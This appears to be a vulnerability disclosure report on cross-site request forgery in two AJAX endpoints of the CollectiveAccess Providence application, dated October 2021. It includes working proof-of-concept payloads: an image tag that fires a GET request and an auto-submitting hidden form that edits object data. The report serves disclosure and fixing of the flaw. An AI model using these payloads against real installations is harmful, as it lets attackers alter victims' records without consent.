Cross-Site Request Forgery (CSRF) in collectiveaccess/providence

Valid

Reported on

Oct 11th 2021

Description

More AJAX endpoints vulnerable to CSRF.

1: GET http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult

2: POST http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData

Proof of Concept

1: http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult?set_name=new&mode=from_results&item_ids=

<img src="http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult? set_name=new&mode=from_results&item_ids=">

2: http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData

<html>
  <body>
        <form action="http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData" method="POST">
        <input type="hidden" name="_formName" value="caEditableResultsComplexDataForm" />
        <input type="hidden" name="form_timestamp" value="2633930542" />
        <input type="hidden" name="id" value="1" />
        <input type="hidden" name="row" value="0" />
        <input type="hidden" name="col" value="0" /> 
        <input type="hidden" name="idno_accession_number" value="edited!" />
        <input type="hidden" name="bundle" value="ca_objects%2Cidno" />
        </form>
        <script>
        document.forms[0].submit();
        </script>
  </body>
</html>